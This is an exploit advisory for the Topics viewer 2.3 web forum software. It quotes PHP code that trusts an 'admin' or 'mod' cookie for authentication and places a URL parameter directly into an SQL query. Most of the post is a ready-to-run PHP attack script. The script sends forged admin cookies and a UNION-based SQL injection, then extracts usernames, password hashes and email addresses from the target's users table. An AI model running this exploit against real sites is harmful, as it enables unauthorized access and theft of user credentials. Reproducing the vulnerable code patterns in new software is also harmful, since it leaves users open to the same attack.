facebook facebook twitter rss

Topics viewer <= 2.3 Authentication Bypass & SQL Injection

Author: ahwak2000 , Published: 02-07-2012
+-------------------------------------------------------------+
| Topics viewer <= 2.3 Authentication Bypass & SQL Injection |
+-------------------------------------------------------------+

author.............: ahwak2000
mail...............: z.u5[at]hotmail[dot]com
software link......: http://nilehoster.com/default/topicsviewer
tested versions....: 2.3
date...............: 30/06/2012
---------------------------------------------------------------
in file /modcp/rmv_topic_pop.php

Line 16. if (isset($_SESSION['admin']) || isset($_COOKIE['admin']) || isset($_SESSION['mod']) || isset($_COOKIE['mod']))
{
.
.
.
Line 38. if(isset ($_GET['id']))

{
if (!empty ($_GET['id']))
{
$sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;"; //<---
$result = @mysql_query ($sql);
$topic = @mysql_fetch_array ($result);
$verify = @mysql_num_rows ($result);

eXploit:
<?
print_r("
------------------------------------------------------------------
_______ _ __ ___
|__ __| (_) \ \ / (_)
| | ___ _ __ _ ___ ___ \ \ / / _ _____ _____ _ __
| |/ _ \| '_ \| |/ __/ __| \ \/ / | |/ _ \ \ /\ / / _ \ '__|
| | (_) | |_) | | (__\__ \ \ / | | __/\ V V / __/ |
|_|\___/| .__/|_|\___|___/ \/ |_|\___| \_/\_/ \___|_|V2.3
| |
|_| BY AHWAK2000
------------------------------------------------------------------
");
if ($argc<2) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' site.com/path/
-----------------------------------------------------------------------------
');

}
if ($argc > 1) {
$host=$argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $host."/modcp/rmv_topic_pop.php?id=-1+/*!union*/+/*!SELeCT*/+1,group_concat(u_name,0x3a,u_mpass,0x3a,u_email),3,4,5,6,7,8,9,10,11,12+/*!frOm*/+users--");
curl_setopt($ch, CURLOPT_COOKIE, "admin=ahwak2000;mod=ahwak2000;");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$buffer = curl_exec($ch);
if(strpos($buffer,"style.css")){
echo "\n\t[-]---------------------------------------------[-]\n";
$reg = '#<li .*>.*:(.*?)¿</span></li>#Us';
preg_match($reg,$buffer,$ahwak);
$s1=explode(",",$ahwak[1]);
$i=1;
foreach($s1 as $ayrik){
print "\n\t[$i] ".trim($ayrik)."\n";
$i++;
}
echo "\n\t[-]---------------------------------------------[-]\n\t\t\tz.u5@hotmail.com";
}

}
?>

Like us on Facebook :